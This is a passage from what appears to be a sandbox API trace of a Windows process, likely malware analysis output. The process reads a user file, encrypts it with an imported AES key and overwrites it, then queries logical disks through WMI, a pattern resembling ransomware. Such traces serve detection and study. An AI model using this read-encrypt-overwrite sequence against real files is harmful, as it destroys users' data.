(dwNewMode=0x0, lpOldMode=0x71ef04c) returned 1 [0202.800] GetFileType (hFile=0x5a4) returned 0x1 [0202.801] WriteFile (in: hFile=0x5a4, lpBuffer=0x3500da8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x71ef114, lpOverlapped=0x0 | out: lpBuffer=0x3500da8*, lpNumberOfBytesWritten=0x71ef114*=0x1000, lpOverlapped=0x0) returned 1 [0202.802] WriteFile (in: hFile=0x5a4, lpBuffer=0x3500da8*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x71ef0e8, lpOverlapped=0x0 | out: lpBuffer=0x3500da8*, lpNumberOfBytesWritten=0x71ef0e8*=0x557, lpOverlapped=0x0) returned 1 [0202.802] CloseHandle (hObject=0x5a4) returned 1 [0202.803] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst", nBufferLength=0x105, lpBuffer=0x71eec38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst", lpFilePart=0x0) returned 0x51 [0202.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef0e4) returned 1 [0202.803] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst"), fInfoLevelId=0x0, lpFileInformation=0x3501dc4 | out: lpFileInformation=0x3501dc4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe952fcd0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x892c)) returned 1 [0202.803] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef0e0) returned 1 [0202.803] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst", nBufferLength=0x105, lpBuffer=0x71eeb24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst", lpFilePart=0x0) returned 0x51 [0202.803] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef018) returned 1 [0202.804] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a4 [0202.804] GetFileType (hFile=0x5a4) returned 0x1 [0202.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef014) returned 1 [0202.804] GetFileType (hFile=0x5a4) returned 0x1 [0202.804] GetFileSize (in: hFile=0x5a4, lpFileSizeHigh=0x71ef120 | out: lpFileSizeHigh=0x71ef120*=0x0) returned 0x892c [0202.804] ReadFile (in: hFile=0x5a4, lpBuffer=0x350201c, nNumberOfBytesToRead=0x892c, lpNumberOfBytesRead=0x71ef0cc, lpOverlapped=0x0 | out: lpBuffer=0x350201c*, lpNumberOfBytesRead=0x71ef0cc*=0x892c, lpOverlapped=0x0) returned 1 [0203.126] CloseHandle (hObject=0x5a4) returned 1 [0203.126] CryptAcquireContextW (in: phProv=0x71ef06c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x71ef06c*=0x7a9310) returned 1 [0203.127] CryptGenRandom (in: hProv=0x7a9310, dwLen=0x10, pbBuffer=0x35b16b4 | out: pbBuffer=0x35b16b4) returned 1 [0203.836] CryptImportKey (in: hProv=0x7a9310, pbData=0x344c200, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x71ef03c | out: phKey=0x71ef03c*=0x77b570) returned 1 [0203.836] CryptContextAddRef (hProv=0x7a9310, pdwReserved=0x0, dwFlags=0x0) returned 1 [0203.836] CryptContextAddRef (hProv=0x7a9310, pdwReserved=0x0, dwFlags=0x0) returned 1 [0203.837] CryptDuplicateKey (in: hKey=0x77b570, pdwReserved=0x0, dwFlags=0x0, phKey=0x71ef02c | out: phKey=0x71ef02c*=0x77b5b0) returned 1 [0203.837] CryptContextAddRef (hProv=0x7a9310, pdwReserved=0x0, dwFlags=0x0) returned 1 [0203.837] CryptSetKeyParam (hKey=0x77b5b0, dwParam=0x4, pbData=0x344c2e0*=0x1, dwFlags=0x0) returned 1 [0203.837] CryptSetKeyParam (hKey=0x77b5b0, dwParam=0x1, pbData=0x344c2ac, dwFlags=0x0) returned 1 [0203.837] CryptEncrypt (in: hKey=0x77b5b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x344c2f0*, pdwDataLen=0x71ef098*=0x8930, dwBufLen=0x8930 | out: pbData=0x344c2f0*, pdwDataLen=0x71ef098*=0x8930) returned 1 [0203.837] CryptEncrypt (in: hKey=0x77b5b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3454c44*, pdwDataLen=0x71ef0a0*=0x0, dwBufLen=0x10 | out: pbData=0x3454c44*, pdwDataLen=0x71ef0a0*=0x10) returned 1 [0203.840] CryptDestroyKey (hKey=0x77b570) returned 1 [0203.840] CryptReleaseContext (hProv=0x7a9310, dwFlags=0x0) returned 1 [0203.840] CryptReleaseContext (hProv=0x7a9310, dwFlags=0x0) returned 1 [0203.840] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst", nBufferLength=0x105, lpBuffer=0x71eeb10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst", lpFilePart=0x0) returned 0x51 [0203.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef004) returned 1 [0203.840] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a8 [0203.841] GetFileType (hFile=0x5a8) returned 0x1 [0203.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef000) returned 1 [0203.841] GetFileType (hFile=0x5a8) returned 0x1 [0203.841] WriteFile (in: hFile=0x5a8, lpBuffer=0x3478404*, nNumberOfBytesToWrite=0x8b40, lpNumberOfBytesWritten=0x71ef0c0, lpOverlapped=0x0 | out: lpBuffer=0x3478404*, lpNumberOfBytesWritten=0x71ef0c0*=0x8b40, lpOverlapped=0x0) returned 1 [0203.844] CloseHandle (hObject=0x5a8) returned 1 [0203.845] CoTaskMemAlloc (cb=0x20c) returned 0x9831858 [0203.845] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x9831858 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0203.845] CoTaskMemFree (pv=0x9831858) [0203.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x71eeaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0203.845] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef040 | out: ppv=0x71ef040*=0x72015c) returned 0x0 [0203.846] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef038 | out: pAptType=0x71ef038*=1) returned 0x0 [0203.846] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef03c | out: ppvObject=0x71ef03c*=0x0) returned 0x80004002 [0203.846] IUnknown:Release (This=0x72015c) returned 0x1 [0203.847] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ee9a8 | out: ppv=0x71ee9a8*=0x6736ee8) returned 0x0 [0203.847] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736ee8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eebc0 | out: ppvObject=0x71eebc0*=0x0) returned 0x80004002 [0203.847] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736ee8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eebd4 | out: ppvObject=0x71eebd4*=0x6738a10) returned 0x0 [0203.847] WbemDefPath:IUnknown:Release (This=0x6736ee8) returned 0x0 [0203.847] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee7f4 | out: ppvObject=0x71ee7f4*=0x6738a10) returned 0x0 [0203.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee7b0 | out: ppvObject=0x71ee7b0*=0x0) returned 0x80004002 [0203.848] WbemDefPath:IUnknown:AddRef (This=0x6738a10) returned 0x3 [0203.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee10c | out: ppvObject=0x71ee10c*=0x0) returned 0x80004002 [0203.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee0bc | out: ppvObject=0x71ee0bc*=0x0) returned 0x80004002 [0203.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee0c8 | out: ppvObject=0x71ee0c8*=0x77bde8) returned 0x0 [0203.848] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77bde8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee0d0 | out: pCid=0x71ee0d0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0203.848] WbemDefPath:IUnknown:Release (This=0x77bde8) returned 0x3 [0203.848] CoGetContextToken (in: pToken=0x71ee128 | out: pToken=0x71ee128) returned 0x0 [0203.848] CoGetContextToken (in: pToken=0x71ee530 | out: pToken=0x71ee530) returned 0x0 [0203.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee5c0 | out: ppvObject=0x71ee5c0*=0x0) returned 0x80004002 [0203.848] WbemDefPath:IUnknown:Release (This=0x6738a10) returned 0x2 [0203.848] WbemDefPath:IUnknown:Release (This=0x6738a10) returned 0x1 [0203.848] CoGetContextToken (in: pToken=0x71eeeb8 | out: pToken=0x71eeeb8) returned 0x0 [0203.848] CoGetContextToken (in: pToken=0x71eee18 | out: pToken=0x71eee18) returned 0x0 [0203.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x71eeee8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71eeee4 | out: ppvObject=0x71eeee4*=0x6738a10) returned 0x0 [0203.848] WbemDefPath:IUnknown:AddRef (This=0x6738a10) returned 0x3 [0203.848] WbemDefPath:IUnknown:Release (This=0x6738a10) returned 0x2 [0203.848] WbemDefPath:IWbemPath:SetText (This=0x6738a10, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0203.849] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a10, puCount=0x71ef06c | out: puCount=0x71ef06c*=0x0) returned 0x0 [0203.849] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x71ef068*=0x0, pszText=0x0 | out: puBuffLength=0x71ef068*=0x20, pszText=0x0) returned 0x0 [0203.849] WbemDefPath:IWbemPath:GetText (in: This=0x6738a10, lFlags=2, puBuffLength=0x71ef068*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef068*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0203.849] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738a10, uRequestedInfo=0x0, puResponse=0x71ef074 | out: puResponse=0x71ef074*=0xc19) returned 0x0 [0203.849] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a10, puCount=0x71ef06c | out: puCount=0x71ef06c*=0x0) returned 0x0 [0203.849] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738a10, uRequestedInfo=0x0, puResponse=0x71ef074 | out: puResponse=0x71ef074*=0xc19) returned 0x0 [0203.849] WbemDefPath:IWbemPath:GetInfo (in: This=0x6738a10, uRequestedInfo=0x0, puResponse=0x71ef074 | out: puResponse=0x71ef074*=0xc19) returned 0x0 [0203.849] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a10, puCount=0x71eefec | out: puCount=0x71eefec*=0x0) returned 0x0 [0203.849] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x71eefd8 | out: puCount=0x71eefd8*=0x2) returned 0x0 [0203.849] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71eefd4*=0x0, pszText=0x0 | out: puBuffLength=0x71eefd4*=0xf, pszText=0x0) returned 0x0 [0203.849] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x71eefd4*=0xf, pszText="00000000000000" | out: puBuffLength=0x71eefd4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0203.849] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eef88 | out: ppv=0x71eef88*=0x72015c) returned 0x0 [0203.849] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71eef80 | out: pAptType=0x71eef80*=1) returned 0x0 [0203.849] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71eef84 | out: ppvObject=0x71eef84*=0x0) returned 0x80004002 [0203.849] IUnknown:Release (This=0x72015c) returned 0x1 [0203.850] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ee8f0 | out: ppv=0x71ee8f0*=0x67370f8) returned 0x0 [0203.850] WbemDefPath:IUnknown:QueryInterface (in: This=0x67370f8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eeb08 | out: ppvObject=0x71eeb08*=0x0) returned 0x80004002 [0203.850] WbemDefPath:IClassFactory:CreateInstance (in: This=0x67370f8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eeb1c | out: ppvObject=0x71eeb1c*=0x6738a80) returned 0x0 [0203.850] WbemDefPath:IUnknown:Release (This=0x67370f8) returned 0x0 [0203.850] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee73c | out: ppvObject=0x71ee73c*=0x6738a80) returned 0x0 [0203.850] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee6f8 | out: ppvObject=0x71ee6f8*=0x0) returned 0x80004002 [0203.851] WbemDefPath:IUnknown:AddRef (This=0x6738a80) returned 0x3 [0203.851] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee054 | out: ppvObject=0x71ee054*=0x0) returned 0x80004002 [0203.851] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee004 | out: ppvObject=0x71ee004*=0x0) returned 0x80004002 [0203.851] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee010 | out: ppvObject=0x71ee010*=0x77bea8) returned 0x0 [0203.851] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77bea8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee018 | out: pCid=0x71ee018*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0203.851] WbemDefPath:IUnknown:Release (This=0x77bea8) returned 0x3 [0203.851] CoGetContextToken (in: pToken=0x71ee070 | out: pToken=0x71ee070) returned 0x0 [0203.851] CoGetContextToken (in: pToken=0x71ee478 | out: pToken=0x71ee478) returned 0x0 [0203.851] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee508 | out: ppvObject=0x71ee508*=0x0) returned 0x80004002 [0203.851] WbemDefPath:IUnknown:Release (This=0x6738a80) returned 0x2 [0203.851] WbemDefPath:IUnknown:Release (This=0x6738a80) returned 0x1 [0203.851] CoGetContextToken (in: pToken=0x71eee00 | out: pToken=0x71eee00) returned 0x0 [0203.851] CoGetContextToken (in: pToken=0x71eed60 | out: pToken=0x71eed60) returned 0x0 [0203.851] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a80, riid=0x71eee30*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x71eee2c | out: ppvObject=0x71eee2c*=0x6738a80) returned 0x0 [0203.851] WbemDefPath:IUnknown:AddRef (This=0x6738a80) returned 0x3 [0203.851] WbemDefPath:IUnknown:Release (This=0x6738a80) returned 0x2 [0203.851] WbemDefPath:IWbemPath:SetText (This=0x6738a80, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0203.851] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738a80, puCount=0x71eefb0 | out: puCount=0x71eefb0*=0x2) returned 0x0 [0203.852] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=4, puBuffLength=0x71eefac*=0x0, pszText=0x0 | out: puBuffLength=0x71eefac*=0xf, pszText=0x0) returned 0x0 [0203.852] WbemDefPath:IWbemPath:GetText (in: This=0x6738a80, lFlags=4, puBuffLength=0x71eefac*=0xf, pszText="00000000000000" | out: puBuffLength=0x71eefac*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0203.852] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eefb0 | out: ppv=0x71eefb0*=0x72015c) returned 0x0 [0203.852] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71eefa8 | out: pAptType=0x71eefa8*=1) returned 0x0 [0203.852] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71eefac | out: ppvObject=0x71eefac*=0x0) returned 0x80004002 [0203.852] IUnknown:Release (This=0x72015c) returned 0x1 [0203.853] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eebd0 | out: ppv=0x71eebd0*=0x672f238) returned 0x0 [0203.853] WbemLocator:IUnknown:QueryInterface (in: This=0x672f238, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eede8 | out: ppvObject=0x71eede8*=0x0) returned 0x80004002 [0203.853] WbemLocator:IClassFactory:CreateInstance (in: This=0x672f238, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eedfc | out: ppvObject=0x71eedfc*=0x6737048) returned 0x0 [0203.853] WbemLocator:IUnknown:Release (This=0x672f238) returned 0x0 [0203.853] WbemLocator:IUnknown:QueryInterface (in: This=0x6737048, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eea1c | out: ppvObject=0x71eea1c*=0x6737048) returned 0x0 [0203.853] WbemLocator:IUnknown:QueryInterface (in: This=0x6737048, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee9d8 | out: ppvObject=0x71ee9d8*=0x0) returned 0x80004002 [0203.853] WbemLocator:IUnknown:AddRef (This=0x6737048) returned 0x3 [0203.853] WbemLocator:IUnknown:QueryInterface (in: This=0x6737048, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee334 | out: ppvObject=0x71ee334*=0x0) returned 0x80004002 [0203.853] WbemLocator:IUnknown:QueryInterface (in: This=0x6737048, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee2e4 | out: ppvObject=0x71ee2e4*=0x0) returned 0x80004002 [0203.853] WbemLocator:IUnknown:QueryInterface (in: This=0x6737048, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee2f0 | out: ppvObject=0x71ee2f0*=0x0) returned 0x80004002 [0203.853] CoGetContextToken (in: pToken=0x71ee350 | out: pToken=0x71ee350) returned 0x0 [0203.853] CoGetContextToken (in: pToken=0x71ee758 | out: pToken=0x71ee758) returned 0x0 [0203.853] WbemLocator:IUnknown:QueryInterface (in: This=0x6737048, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee7e8 | out: ppvObject=0x71ee7e8*=0x0) returned 0x80004002 [0203.853] WbemLocator:IUnknown:Release (This=0x6737048) returned 0x2 [0203.853] WbemLocator:IUnknown:Release (This=0x6737048) returned 0x1 [0203.853] 